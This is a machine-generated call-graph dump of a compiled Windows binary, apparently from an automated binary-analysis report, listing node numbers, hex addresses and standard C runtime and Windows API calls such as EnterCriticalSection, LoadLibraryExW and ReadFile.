16662->16653 16664 6d1325 ___scrt_is_nonwritable_in_current_image 16663->16664 16671 6d1d71 EnterCriticalSection 16664->16671 16666 6d1333 16672 6d11e4 16666->16672 16671->16666 16673 6d1203 16672->16673 16674 6d11fb 16672->16674 16673->16674 16679 6d5327 16673->16679 16676 6d1368 16674->16676 16711 6d1d88 LeaveCriticalSection 16676->16711 16678 6d1351 16678->16662 16680 6d5332 RtlFreeHeap 16679->16680 16684 6d535c 16679->16684 16681 6d5347 GetLastError 16680->16681 16680->16684 16682 6d5354 __dosmaperr 16681->16682 16685 6d1374 16682->16685 16684->16674 16688 6d570b GetLastError 16685->16688 16687 6d1379 16687->16684 16689 6d5727 16688->16689 16690 6d5721 16688->16690 16692 6d6023 __dosmaperr 6 API calls 16689->16692 16694 6d572b SetLastError 16689->16694 16691 6d5fe4 __dosmaperr 6 API calls 16690->16691 16691->16689 16693 6d5743 16692->16693 16693->16694 16696 6d6664 __dosmaperr 12 API calls 16693->16696 16694->16687 16697 6d5758 16696->16697 16698 6d5771 16697->16698 16699 6d5760 16697->16699 16701 6d6023 __dosmaperr 6 API calls 16698->16701 16700 6d6023 __dosmaperr 6 API calls 16699->16700 16702 6d576e 16700->16702 16703 6d577d 16701->16703 16708 6d5327 ___free_lconv_mon 12 API calls 16702->16708 16704 6d5798 16703->16704 16705 6d5781 16703->16705 16706 6d58cc __dosmaperr 12 API calls 16704->16706 16707 6d6023 __dosmaperr 6 API calls 16705->16707 16709 6d57a3 16706->16709 16707->16702 16708->16694 16710 6d5327 ___free_lconv_mon 12 API calls 16709->16710 16710->16694 16711->16678 16712->16658 16716 6d8bba 16713->16716 16715 6cf2df CallUnexpected 16715->16646 16717 6d8bc9 CallUnexpected 16716->16717 16718 6d8bd6 16717->16718 16720 6d6230 16717->16720 16718->16715 16723 6d637d 16720->16723 16724 6d63ad 16723->16724 16728 6d624c 16723->16728 16724->16728 16730 6d62b2 16724->16730 16727 6d63c7 GetProcAddress 16727->16728 16729 6d63d7 std::_Lockit::_Lockit 16727->16729 16728->16718 16729->16728 16736 6d62c3 ___vcrt_FlsGetValue 16730->16736 16731 6d6359 16731->16727 16731->16728 16732 6d62e1 LoadLibraryExW 16733 6d62fc GetLastError 16732->16733 16734 6d6360 16732->16734 16733->16736 16734->16731 16735 6d6372 FreeLibrary 16734->16735 16735->16731 16736->16731 16736->16732 16737 6d632f LoadLibraryExW 16736->16737 16737->16734 16737->16736 19614 6c70e0 19615 6c70e9 _Fputc 19614->19615 19620 6c8112 19615->19620 19617 6c70f8 19626 6c72f4 19617->19626 19621 6c811e __EH_prolog3 19620->19621 19622 6c71b3 std::ios_base::_Init 3 API calls 19621->19622 19623 6c8153 19622->19623 19625 6c8164 std::ios_base::_Init 19623->19625 19629 6c7852 19623->19629 19625->19617 19668 6c7309 19626->19668 19630 6c785e __EH_prolog3 19629->19630 19631 6c7544 std::_Lockit::_Lockit 7 API calls 19630->19631 19632 6c7869 19631->19632 19640 6c789a 19632->19640 19641 6c774f 19632->19641 19634 6c7575 std::_Lockit::~_Lockit 2 API calls 19636 6c78d7 std::ios_base::_Init 19634->19636 19635 6c787c 19647 6c78e5 19635->19647 19636->19625 19640->19634 19642 6c71b3 std::ios_base::_Init 3 API calls 19641->19642 19643 6c775a 19642->19643 19644 6c776e 19643->19644 19655 6c77e3 19643->19655 19644->19635 19648 6c78f1 19647->19648 19649 6c7884 19647->19649 19658 6c9cd4 19648->19658 19651 6c76d0 19649->19651 19652 6c76de 19651->19652 19654 6c76ea _Yarn ___std_exception_copy 19651->19654 19653 6d2abe ___std_exception_destroy 14 API calls 19652->19653 19652->19654 19653->19654 19654->19640 19654->19654 19656 6c76d0 _Yarn 14 API calls 19655->19656 19657 6c776c 19656->19657 19657->19635 19659 6c9ce4 EncodePointer 19658->19659 19661 6d1fe3 19658->19661 19659->19649 19659->19661 19660 6d7750 CallUnexpected 2 API calls 19660->19661 19661->19660 19662 6d7777 CallUnexpected 48 API calls 19661->19662 19663 6d1ffd IsProcessorFeaturePresent 19661->19663 19664 6cf1ef CallUnexpected 21 API calls 19661->19664 19665 6d1ac0 CallUnexpected 8 API calls 19661->19665 19666 6d40dc CallUnexpected 23 API calls 19661->19666 19667 6d40db 19661->19667 19662->19661 19663->19661 19664->19661 19665->19661 19666->19661 19667->19649 19669 6c731f 19668->19669 19670 6c7318 19668->19670 19677 6d105b 19669->19677 19674 6d10cc 19670->19674 19673 6c7144 19675 6d105b std::ios_base::_Init 32 API calls 19674->19675 19676 6d10de 19675->19676 19676->19673 19680 6d12be 19677->19680 19681 6d12ca ___scrt_is_nonwritable_in_current_image 19680->19681 19688 6d1d71 EnterCriticalSection 19681->19688 19683 6d12d8 19689 6d10e2 19683->19689 19685 6d12e5 19699 6d130d 19685->19699 19688->19683 19690 6d1170 std::_Lockit::_Lockit 19689->19690 19691 6d10fd 19689->19691 19690->19685 19691->19690 19692 6d1150 19691->19692 19694 6dbcd5 std::ios_base::_Init 32 API calls 19691->19694 19692->19690 19693 6dbcd5 std::ios_base::_Init 32 API calls 19692->19693 19695 6d1166 19693->19695 19696 6d1146 19694->19696 19697 6d5327 ___free_lconv_mon 14 API calls 19695->19697 19698 6d5327 ___free_lconv_mon 14 API calls 19696->19698 19697->19690 19698->19692 19702 6d1d88 LeaveCriticalSection 19699->19702 19701 6d108c 19701->19673 19702->19701 21043 6c89f0 21044 6c8a04 21043->21044 21045 6c8c55 78 API calls 21044->21045 21050 6c8a5f 21044->21050 21046 6c8a2f 21045->21046 21047 6c8a4c 21046->21047 21048 6d1424 76 API calls 21046->21048 21046->21050 21047->21050 21051 6d264a 21047->21051 21048->21047 21052 6d266a 21051->21052 21053 6d2655 21051->21053 21055 6d2687 21052->21055 21056 6d2672 21052->21056 21054 6d1374 __dosmaperr 14 API calls 21053->21054 21059 6d265a 21054->21059 21065 6dbfa6 21055->21065 21057 6d1374 __dosmaperr 14 API calls 21056->21057 21060 6d2677 21057->21060 21062 6d1a5f __strnicoll 29 API calls 21059->21062 21063 6d1a5f __strnicoll 29 API calls 21060->21063 21061 6d2682 21061->21050 21064 6d2665 21062->21064 21063->21061 21064->21050 21066 6dbfba _Fputc 21065->21066 21069 6dc54f 21066->21069 21068 6dbfc6 _Fputc 21068->21061 21070 6dc55b ___scrt_is_nonwritable_in_current_image 21069->21070 21071 6dc585 21070->21071 21072 6dc562 21070->21072 21080 6cd19f EnterCriticalSection 21071->21080 21074 6d1c08 __strnicoll 29 API calls 21072->21074 21076 6dc57b 21074->21076 21075 6dc593 21081 6dc3ae 21075->21081 21076->21068 21078 6dc5a2 21094 6dc5d4 21078->21094 21080->21075 21082 6dc3bd 21081->21082 21083 6dc3e5 21081->21083 21084 6d1c08 __strnicoll 29 API calls 21082->21084 21085 6d8ab4 _Ungetc 29 API calls 21083->21085 21093 6dc3d8 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21084->21093 21086 6dc3ee 21085->21086 21087 6dbde0 33 API calls 21086->21087 21088 6dc40c 21087->21088 21089 6dc498 21088->21089 21091 6dc4af 21088->21091 21088->21093 21090 6dc038 34 API calls 21089->21090 21090->21093 21092 6dc1e3 33 API calls 21091->21092 21091->21093 21092->21093 21093->21078 21097 6cd1b3 LeaveCriticalSection 21094->21097 21096 6dc5dc 21096->21076 21097->21096 20189 6c8ac0 20190 6c8ae2 20189->20190 20194 6c8af7 20189->20194 20195 6c8c55 20190->20195 20198 6c8cc1 20195->20198 20199 6c8c70 20195->20199 20196 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 20197 6c8ae7 20196->20197 20197->20194 20201 6d2ad9 20197->20201 20198->20196 20199->20198 20200 6d2b14 78 API calls 20199->20200 20200->20198 20202 6d2af9 20201->20202 20203 6d2ae4 20201->20203 20202->20203 20205 6d2b00 20202->20205 20204 6d1374 __dosmaperr 14 API calls 20203->20204 20206 6d2ae9 20204->20206 20211 6d1424 20205->20211 20208 6d1a5f __strnicoll 29 API calls 20206->20208 20210 6d2af4 20208->20210 20209 6d2b0f 20209->20194 20210->20194 20212 6d1437 _Fputc 20211->20212 20215 6d169d 20212->20215 20214 6d144c _Fputc 20214->20209 20217 6d16a9 ___scrt_is_nonwritable_in_current_image 20215->20217 20216 6d16af 20218 6d1c08 __strnicoll 29 API calls 20216->20218 20217->20216 20219 6d16f2 20217->20219 20220 6d16ca 20218->20220 20226 6cd19f EnterCriticalSection 20219->20226 20220->20214 20222 6d16fe 20227 6d15b1 20222->20227 20224 6d1714 20238 6d173d 20224->20238 20226->20222 20228 6d15c4 20227->20228 20229 6d15d7 20227->20229 20228->20224 20241 6d14d8 20229->20241 20231 6d15fa 20234 6d1615 20231->20234 20237 6d1688 20231->20237 20245 6dbfdc 20231->20245 20233 6d2248 ___scrt_uninitialize_crt 73 API calls 20236 6d1628 20233->20236 20234->20233 20259 6dbdc2 20236->20259 20237->20224 20300 6cd1b3 LeaveCriticalSection 20238->20300 20240 6d1745 20240->20220 20242 6d1541 20241->20242 20243 6d14e9 20241->20243 20242->20231 20243->20242 20244 6dbd82 31 API calls 20243->20244 20244->20242 20246 6dc3ae 20245->20246 20247 6dc3bd 20246->20247 20248 6dc3e5 20246->20248 20249 6d1c08 __strnicoll 29 API calls 20247->20249 20250 6d8ab4 _Ungetc 29 API calls 20248->20250 20258 6dc3d8 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20249->20258 20251 6dc3ee 20250->20251 20262 6dbde0 20251->20262 20254 6dc498 20265 6dc038 20254->20265 20256 6dc4af 20256->20258 20277 6dc1e3 20256->20277 20258->20234 20260 6dbf23 _Fputc 31 API calls 20259->20260 20261 6dbddb 20260->20261 20261->20237 20284 6dbdfe 20262->20284 20266 6dc047 _Fputc 20265->20266 20267 6d8ab4 _Ungetc 29 API calls 20266->20267 20269 6dc063 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20267->20269 20268 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 20270 6dc1e1 20268->20270 20271 6dbde0 33 API calls 20269->20271 20273 6dc06f 20269->20273 20270->20258 20272 6dc0c3 20271->20272 20272->20273 20274 6dc0f5 ReadFile 20272->20274 20273->20268 20274->20273 20275 6dc11c 20274->20275 20276 6dbde0 33 API calls 20275->20276 20276->20273 20278 6d8ab4 _Ungetc 29 API calls 20277->20278 20279 6dc1f6 20278->20279 20280 6dbde0 33 API calls 20279->20280 20283 6dc240 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20279->20283 20281 6dc29d 20280->20281 20282 6dbde0 33 API calls 20281->20282 20281->20283 20282->20283 20283->20258 20285 6dbe0a ___scrt_is_nonwritable_in_current_image 20284->20285 20286 6dbe4d 20285->20286 20288 6dbe93 20285->20288 20294 6dbdf9 20285->20294 20287 6d1c08 __strnicoll 29 API calls 20286->20287 20287->20294 20295 6dcc88 EnterCriticalSection 20288->20295 20290 6dbe99 20291 6dbeba 20290->20291 20292 6dbf23 _Fputc 31 API calls 20290->20292 20296 6dbf1b 20291->20296 20292->20291 20294->20254 20294->20256 20294->20258 20295->20290 20299 6dccab LeaveCriticalSection 20296->20299 20298 6dbf21 20298->20294 20299->20298 20300->20240 20339 6cd2a0 20340 6d21da ___scrt_uninitialize_crt 77 API calls 20339->20340 20341 6cd2a8 20340->20341 20349 6d7b62 20341->20349 20343 6cd2ad 20359 6d7c0d 20343->20359 20346 6cd2d7 20347 6d5327 ___free_lconv_mon 14 API calls 20346->20347 20348 6cd2e2 20347->20348 20350 6d7b6e ___scrt_is_nonwritable_in_current_image 20349->20350 20363 6d1d71 EnterCriticalSection 20350->20363 20352 6d7b79 20353 6d7be5 20352->20353 20356 6d7bb9 DeleteCriticalSection 20352->20356 20364 6d2032 20352->20364 20368 6d7c04 20353->20368 20358 6d5327 ___free_lconv_mon 14 API calls 20356->20358 20358->20352 20360 6d7c24 20359->20360 20362 6cd2bc DeleteCriticalSection 20359->20362 20361 6d5327 ___free_lconv_mon 14 API calls 20360->20361 20360->20362 20361->20362 20362->20343 20362->20346 20363->20352 20365 6d2045 _Fputc 20364->20365 20371 6d20f0 20365->20371 20367 6d2051 _Fputc 20367->20352 20443 6d1d88 LeaveCriticalSection 20368->20443 20370 6d7bf1 20370->20343 20372 6d20fc ___scrt_is_nonwritable_in_current_image 20371->20372 20373 6d2129 20372->20373 20374 6d2106 20372->20374 20381 6d2121 20373->20381 20382 6cd19f EnterCriticalSection 20373->20382 20375 6d1c08 __strnicoll 29 API calls 20374->20375 20375->20381 20377 6d2147 20383 6d2062 20377->20383 20379 6d2154 20397 6d217f 20379->20397 20381->20367 20382->20377 20384 6d206f 20383->20384 20385 6d2092 20383->20385 20386 6d1c08 __strnicoll 29 API calls 20384->20386 20387 6d2248 ___scrt_uninitialize_crt 73 API calls 20385->20387 20395 6d208a 20385->20395 20386->20395 20388 6d20aa 20387->20388 20389 6d7c0d 14 API calls 20388->20389 20390 6d20b2 20389->20390 20391 6d8ab4 _Ungetc 29 API calls 20390->20391 20392 6d20be 20391->20392 20400 6dcd86 20392->20400 20395->20379 20396 6d5327 ___free_lconv_mon 14 API calls 20396->20395 20442 6cd1b3 LeaveCriticalSection 20397->20442 20399 6d2185 20399->20381 20401 6dcdaf 20400->20401 20402 6d20c5 20400->20402 20403 6dcdfe 20401->20403 20405 6dcdd6 20401->20405 20402->20395 20402->20396 20404 6d1c08 __strnicoll 29 API calls 20403->20404 20404->20402 20407 6dce29 20405->20407 20408 6dce35 ___scrt_is_nonwritable_in_current_image 20407->20408 20415 6dcc88 EnterCriticalSection 20408->20415 20410 6dce43 20411 6dce74 20410->20411 20416 6dcce6 20410->20416 20429 6dceae 20411->20429 20415->20410 20417 6dca3f _Fputc 29 API calls 20416->20417 20420 6dccf6 20417->20420 20418 6dccfc 20432 6dcaa9 20418->20432 20420->20418 20421 6dcd2e 20420->20421 20422 6dca3f _Fputc 29 API calls 20420->20422 20421->20418 20423 6dca3f _Fputc 29 API calls 20421->20423 20424 6dcd25 20422->20424 20425 6dcd3a CloseHandle 20423->20425 20427 6dca3f _Fputc 29 API calls 20424->20427 20425->20418 20426 6dcd46 GetLastError 20425->20426 20426->20418 20427->20421 20428 6dcd54 _Fputc 20428->20411 20441 6dccab LeaveCriticalSection 20429->20441 20431 6dce97 20431->20402 20433 6dcb1f 20432->20433 20435 6dcab8 20432->20435 20434 6d1374 __dosmaperr 14 API calls 20433->20434 20436 6dcb24 20434->20436 20435->20433 20440 6dcae2 20435->20440 20437 6d1387 __dosmaperr 14 API calls 20436->20437 20438 6dcb0f 20437->20438 20438->20428 20439 6dcb09 SetStdHandle 20439->20438 20440->20438 20440->20439 20441->20431 20442->20399 20443->20370 20474 6d6cb1 20475 6d6ccc ___scrt_is_nonwritable_in_current_image 20474->20475 20486 6d1d71 EnterCriticalSection 20475->20486 20477 6d6cd3 20487 6dcbea 20477->20487 20480 6d6cf1 20506 6d6d17 20480->20506 20485 6d6e02 2 API calls 20485->20480 20486->20477 20488 6dcbf6 ___scrt_is_nonwritable_in_current_image 20487->20488 20489 6dcbff 20488->20489 20490 6dcc20 20488->20490 20492 6d1374 __dosmaperr 14 API calls 20489->20492 20509 6d1d71 EnterCriticalSection 20490->20509 20493 6dcc04 20492->20493 20494 6d1a5f __strnicoll 29 API calls 20493->20494 20495 6d6ce2 20494->20495 20495->20480 20500 6d6d4c GetStartupInfoW 20495->20500 20496 6dcc58 20517 6dcc7f 20496->20517 20497 6dcc2c 20497->20496 20510 6dcb3a 20497->20510 20501 6d6d69 20500->20501 20503 6d6cec 20500->20503 20502 6dcbea 30 API calls 20501->20502 20501->20503 20504 6d6d91 20502->20504 20503->20485 20504->20503 20505 6d6dc1 GetFileType 20504->20505 20505->20504 20521 6d1d88 LeaveCriticalSection 20506->20521 20508 6d6d02 20509->20497 20511 6d6664 __dosmaperr 14 API calls 20510->20511 20513 6dcb4c 20511->20513 20512 6dcb59 20514 6d5327 ___free_lconv_mon 14 API calls 20512->20514 20513->20512 20515 6d60e0 6 API calls 20513->20515 20516 6dcbae 20514->20516 20515->20513 20516->20497 20520 6d1d88 LeaveCriticalSection 20517->20520 20519 6dcc86 20519->20495 20520->20519 20521->20508 21323 6c8bb0 21324 6c8bee 21323->21324 21325 6c8bb9 21323->21325 21325->21324 21328 6d2187 21325->21328 21327 6c8be1 21329 6d2199 21328->21329 21331 6d21a2 ___scrt_uninitialize_crt 21328->21331 21330 6d2305 ___scrt_uninitialize_crt 77 API calls 21329->21330 21332 6d219f 21330->21332 21333 6d21b1 21331->21333 21336 6d248a 21331->21336 21332->21327 21333->21327 21337 6d2496 ___scrt_is_nonwritable_in_current_image 21336->21337 21344 6cd19f EnterCriticalSection 21337->21344 21339 6d24a4 21340 6d21e3 ___scrt_uninitialize_crt 77 API calls 21339->21340 21341 6d24b5 21340->21341 21345 6d24de 21341->21345 21344->21339 21348 6cd1b3 LeaveCriticalSection 21345->21348 21347 6d21d8 21347->21327 21348->21347 16746 6ca1b2 16747 6ca1be ___scrt_is_nonwritable_in_current_image 16746->16747 16772 6c741a 16747->16772 16749 6ca1c5 16750 6ca31e 16749->16750 16756 6ca1ef ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 16749->16756 16808 6c9ad3 IsProcessorFeaturePresent 16750->16808 16752 6ca325 16790 6cf1d9 16752->16790 16755 6cf1ef CallUnexpected 21 API calls 16757 6ca333 16755->16757 16758 6ca20e 16756->16758 16759 6ca28f 16756->16759 16793 6cf223 16756->16793 16783 6d174c 16759->16783 16762 6ca295 16787 6c20b0 6 API calls 16762->16787 16765 6c9a80 CallUnexpected GetModuleHandleW 16766 6ca2b6 16765->16766 16766->16752 16767 6ca2ba 16766->16767 16768 6ca2c3 16767->16768 16799 6cf205 16767->16799 16802 6c7453 16768->16802 16773 6c7423 16772->16773 16812 6c973b IsProcessorFeaturePresent 16773->16812 16777 6c7434 16778 6c7438 16777->16778 16822 6cd100 16777->16822 16778->16749 16781 6c744f 16781->16749 16784 6d175a 16783->16784 16785 6d1755 16783->16785 16784->16762 16894 6d1875 16785->16894 16788 6c7231 __ehhandler$___std_fs_change_permissions@12 5 API calls 16787->16788 17778 6c20a0 16787->17778 16789 6c217c 16788->16789 16789->16765 16791 6cf324 CallUnexpected 21 API calls 16790->16791 16792 6ca32b 16791->16792 16792->16755 16794 6cf239 ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit 16793->16794 16794->16759 16795 6d55ba __Getctype 48 API calls 16794->16795 16798 6d395c 16795->16798 16796 6d1fe3 CallUnexpected 48 API calls 16797 6d3986 16796->16797 16798->16796 16800 6cf324 CallUnexpected 21 API calls 16799->16800 16801 6cf210 16800->16801 16801->16768 16803 6c745f 16802->16803 16807 6c7475 16803->16807 18304 6cd112 16803->18304 16805 6c746d 16806 6cabae ___scrt_uninitialize_crt 7 API calls 16805->16806 16806->16807 16807->16758 16809 6c9ae9 CallUnexpected std::bad_exception::bad_exception 16808->16809 16810 6c9b94 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16809->16810 16811 6c9bd8 CallUnexpected 16810->16811 16811->16752 16813 6c742f 16812->16813 16814 6cab8f 16813->16814 16831 6d4ff6 16814->16831 16818 6cabab 16818->16777 16819 6caba0 16819->16818 16845 6d5032 16819->16845 16821 6cab98 16821->16777 16885 6d7699 16822->16885 16825 6cabae 16826 6cabb7 16825->16826 16827 6cabc1 16825->16827 16828 6d40b3 ___vcrt_uninitialize_ptd 6 API calls 16826->16828 16827->16778 16829 6cabbc 16828->16829 16830 6d5032 ___vcrt_uninitialize_locks DeleteCriticalSection 16829->16830 16830->16827 16832 6d4fff 16831->16832 16834 6d5028 16832->16834 16835 6cab94 16832->16835 16849 6df57a 16832->16849 16836 6d5032 ___vcrt_uninitialize_locks DeleteCriticalSection 16834->16836 16835->16821 16837 6d4080 16835->16837 16836->16835 16866 6df48b 16837->16866 16842 6d40b0 16842->16819 16844 6d4095 16844->16819 16846 6d505c 16845->16846 16847 6d503d 16845->16847 16846->16821 16848 6d5047 DeleteCriticalSection 16847->16848 16848->16846 16848->16848 16854 6df60c 16849->16854 16852 6df5b2 InitializeCriticalSectionAndSpinCount 16853 6df59d 16852->16853 16853->16832 16855 6df594 16854->16855 16858 6df62d 16854->16858 16855->16852 16855->16853 16856 6df695 GetProcAddress 16856->16855 16858->16855 16858->16856 16859 6df686 16858->16859 16861 6df5c1 LoadLibraryExW 16858->16861 16859->16856 16860 6df68e FreeLibrary 16859->16860 16860->16856 16862 6df5d8 GetLastError 16861->16862 16863 6df608 16861->16863 16862->16863 16864 6df5e3 ___vcrt_FlsGetValue 16862->16864 16863->16858 16864->16863 16865 6df5f9 LoadLibraryExW 16864->16865 16865->16858 16867 6df60c ___vcrt_FlsGetValue 5 API calls 16866->16867 16868 6df4a5 16867->16868 16869 6df4be TlsAlloc 16868->16869 16870 6d408a 16868->16870 16870->16844 16871 6df53c 16870->16871 16872 6df60c ___vcrt_FlsGetValue 5 API calls 16871->16872 16873 6df556 16872->16873 16874 6df571 TlsSetValue 16873->16874 16875 6d40a3 16873->16875 16874->16875 16875->16842 16876 6d40b3 16875->16876 16877 6d40bd 16876->16877 16878 6d40c3 16876->16878 16880 6df4c6 16877->16880 16878->16844 16881 6df60c ___vcrt_FlsGetValue 5 API calls 16880->16881 16882 6df4e0 16881->16882 16883 6df4f8 TlsFree 16882->16883 16884 6df4ec 16882->16884 16883->16884 16884->16878 16886 6d76a9 16885->16886 16887 6c7441 16885->16887 16886->16887 16889 6d6e02 16886->16889 16887->16781 16887->16825 16890 6d6e09 16889->16890 16891 6d6e4c GetStdHandle 16890->16891 16892 6d6eae 16890->16892 16893 6d6e5f GetFileType 16890->16893 16891->16890 16892->16886 16893->16890 16895 6d187e 16894->16895 16899 6d1894 16894->16899 16895->16899 16900 6d17b6 16895->16900 16897 6d188b 16897->16899 16917 6d1983 16897->16917 16899->16784 16901 6d17bf 16900->16901 16902 6d17c2 16900->16902 16901->16897 16926 6d6ed0 16902->16926 16907 6d17df 16953 6d18a1 16907->16953 16908 6d17d3 16909 6d5327 ___free_lconv_mon 14 API calls 16908->16909 16911 6d17d9 16909->16911 16911->16897 16913 6d5327 ___free_lconv_mon 14 API calls 16914 6d1803 16913->16914 16915 6d5327 ___free_lconv_mon 14 API calls 16914->16915 16916 6d1809 16915->16916 16916->16897 16918 6d19f4 16917->16918 16923 6d1992 16917->16923 16918->16899 16919 6d6664 __dosmaperr 14 API calls 16919->16923 16920 6d19f8 16921 6d5327 ___free_lconv_mon 14 API calls 16920->16921 16921->16918 16922 6d5471 WideCharToMultiByte _Fputc 16922->16923 16923->16918 16923->16919 16923->16920 16923->16922 16925 6d5327 ___free_lconv_mon 14 API calls 16923->16925 17497 6dc6b5 16923->17497 16925->16923 16927 6d6ed9 16926->16927 16928 6d17c8 16926->16928 16975 6d5675 16927->16975 16932 6dc5de GetEnvironmentStringsW 16928->16932 16933 6dc5f6 16932->16933 16948 6d17cd 16932->16948 16934 6d5471 _Fputc WideCharToMultiByte 16933->16934 16935 6dc613 16934->16935 16936 6dc61d FreeEnvironmentStringsW 16935->16936 16937 6dc628 16935->16937 16936->16948 16938 6d5361 __strnicoll 15 API calls 16937->16938 16939 6dc62f 16938->16939 16940 6dc648 16939->16940 16941 6dc637 16939->16941 16943 6d5471 _Fputc WideCharToMultiByte 16940->16943 16942 6d5327 ___free_lconv_mon 14 API calls 16941->16942 16945 6dc63c FreeEnvironmentStringsW 16942->16945 16944 6dc658 16943->16944 16946 6dc65f 16944->16946 16947 6dc667 16944->16947 16945->16948 16949 6d5327 ___free_lconv_mon 14 API calls 16946->16949 16950 6d5327 ___free_lconv_mon 14 API calls 16947->16950 16948->16907 16948->16908 16951 6dc665 FreeEnvironmentStringsW 16949->16951 16950->16951 16951->16948 16954 6d18b6 16953->16954 16955 6d6664 __dosmaperr 14 API calls 16954->16955 16956 6d18dd 16955->16956 16957 6d18ef 16956->16957 16958 6d18e5 16956->16958 16961 6d194c 16957->16961 16963 6d6664 __dosmaperr 14 API calls 16957->16963 16964 6d195b 16957->16964 16968 6d1976 16957->16968 16970 6d5327 ___free_lconv_mon 14 API calls 16957->16970 17478 6d4f9c 16957->17478 16959 6d5327 ___free_lconv_mon 14 API calls 16958->16959 16960 6d17e6 16959->16960 16960->16913 16962 6d5327 ___free_lconv_mon 14 API calls 16961->16962 16962->16960 16963->16957 17487 6d1846 16964->17487 17493 6d1a8c IsProcessorFeaturePresent 16968->17493 16969 6d5327 ___free_lconv_mon 14 API calls 16972 6d1968 16969->16972 16970->16957 16974 6d5327 ___free_lconv_mon 14 API calls 16972->16974 16973 6d1982 16974->16960 16976 6d5686 16975->16976 16977 6d5680 16975->16977 16981 6d568c 16976->16981 17030 6d6023 16976->17030 17025 6d5fe4 16977->17025 16984 6d5691 16981->16984 17047 6d1fe3 16981->17047 16982 6d56a4 17035 6d6664 16982->17035 17003 6d7291 16984->17003 16988 6d56cd 16991 6d6023 __dosmaperr 6 API calls 16988->16991 16989 6d56b8 16990 6d6023 __dosmaperr 6 API calls 16989->16990 16992 6d56c4 16990->16992 16993 6d56d9 16991->16993 16996 6d5327 ___free_lconv_mon 14 API calls 16992->16996 16994 6d56dd 16993->16994 16995 6d56ec 16993->16995 16997 6d6023 __dosmaperr 6 API calls 16994->16997 17042 6d58cc 16995->17042 16999 6d56ca 16996->16999 16997->16992 16999->16981 17001 6d5327 ___free_lconv_mon 14 API calls 17004 6d72bb 17003->17004 17299 6d711d 17004->17299 17009 6d72ed 17011 6d5327 ___free_lconv_mon 14 API calls 17009->17011 17010 6d72fb 17313 6d6f18 17010->17313 17013 6d72d4 17011->17013 17013->16928 17015 6d7333 17016 6d1374 __dosmaperr 14 API calls 17015->17016 17017 6d7338 17016->17017 17019 6d5327 ___free_lconv_mon 14 API calls 17017->17019 17018 6d737a 17021 6d73c3 17018->17021 17324 6d764c 17018->17324 17019->17013 17020 6d734e 17020->17018 17023 6d5327 ___free_lconv_mon 14 API calls 17020->17023 17022 6d5327 ___free_lconv_mon 14 API calls 17021->17022 17022->17013 17023->17018 17026 6d637d std::_Lockit::_Lockit 5 API calls 17025->17026 17027 6d6000 17026->17027 17028 6d6009 17027->17028 17029 6d601b TlsGetValue 17027->17029 17028->16976 17031 6d637d std::_Lockit::_Lockit 5 API calls 17030->17031 17032 6d603f 17031->17032 17033 6d605d TlsSetValue 17032->17033 17034 6d56a0 17032->17034 17034->16981 17034->16982 17041 6d6671 __dosmaperr 17035->17041 17036 6d66b1 17038 6d1374 __dosmaperr 13 API calls 17036->17038 17037 6d669c HeapAlloc 17039 6d56b0 17037->17039 17037->17041 17038->17039 17039->16988 17039->16989 17041->17036 17041->17037 17056 6cf50b 17041->17056 17070 6d5a32 17042->17070 17172 6d7750 17047->17172 17050 6d1ffd IsProcessorFeaturePresent 17054 6d1fe8 17050->17054 17051 6cf1ef CallUnexpected 21 API calls 17051->17054 17054->17047 17054->17050 17054->17051 17055 6d40db 17054->17055 17175 6d7777 17054->17175 17202 6d1ac0 17054->17202 17208 6d40dc 17054->17208 17059 6cf546 17056->17059 17060 6cf552 ___scrt_is_nonwritable_in_current_image 17059->17060 17065 6d1d71 EnterCriticalSection 17060->17065 17062 6cf55d CallUnexpected 17066 6cf594 17062->17066 17065->17062 17069 6d1d88 LeaveCriticalSection 17066->17069 17068 6cf516 17068->17041 17069->17068 17071 6d5a3e ___scrt_is_nonwritable_in_current_image 17070->17071 17084 6d1d71 EnterCriticalSection 17071->17084 17073 6d5a48 17085 6d5a78 17073->17085 17076 6d5a84 17077 6d5a90 ___scrt_is_nonwritable_in_current_image 17076->17077 17089 6d1d71 EnterCriticalSection 17077->17089 17079 6d5a9a 17090 6d5881 17079->17090 17081 6d5ab2 17094 6d5ad2 17081->17094 17084->17073 17088 6d1d88 LeaveCriticalSection 17085->17088 17087 6d593a 17087->17076 17088->17087 17089->17079 17091 6d58b7 __Getctype 17090->17091 17092 6d5890 __Getctype 17090->17092 17091->17081 17092->17091 17097 6d9afa 17092->17097 17171 6d1d88 LeaveCriticalSection 17094->17171 17096 6d56f7 17096->17001 17098 6d9b7a 17097->17098 17101 6d9b10 17097->17101 17100 6d5327 ___free_lconv_mon 14 API calls 17098->17100 17123 6d9bc8 17098->17123 17102 6d9b9c 17100->17102 17101->17098 17103 6d9b43 17101->17103 17107 6d5327 ___free_lconv_mon 14 API calls 17101->17107 17104 6d5327 ___free_lconv_mon 14 API calls 17102->17104 17109 6d5327 ___free_lconv_mon 14 API calls 17103->17109 17124 6d9b65 17103->17124 17105 6d9baf 17104->17105 17106 6d5327 ___free_lconv_mon 14 API calls 17110 6d9b6f 17106->17110 17112 6d9b38 17107->17112 17115 6d9b5a 17109->17115 17125 6d8f51 17112->17125 17113 6d9bd6 17165 6d9c94 17123->17165 17124->17106 17166 6d9ca1 17165->17166 17170 6d9cc0 17165->17170 17167 6d935b __Getctype 14 API calls 17166->17167 17166->17170 17170->17113 17171->17096 17222 6d79d3 17172->17222 17176 6d7783 ___scrt_is_nonwritable_in_current_image 17175->17176 17177 6d570b __dosmaperr 14 API calls 17176->17177 17178 6d77d3 17176->17178 17181 6d77e5 CallUnexpected 17176->17181 17185 6d77b4 CallUnexpected 17176->17185 17177->17185 17179 6d1374 __dosmaperr 14 API calls 17178->17179 17183 6d77d8 17179->17183 17180 6d77bd 17180->17054 17182 6d781b CallUnexpected 17181->17182 17236 6d1d71 EnterCriticalSection 17181->17236 17188 6d7858 17182->17188 17189 6d7955 17182->17189 17196 6d7886 17182->17196 17233 6d1a5f 17183->17233 17185->17178 17185->17180 17185->17181 17188->17196 17237 6d55ba GetLastError 17188->17237 17190 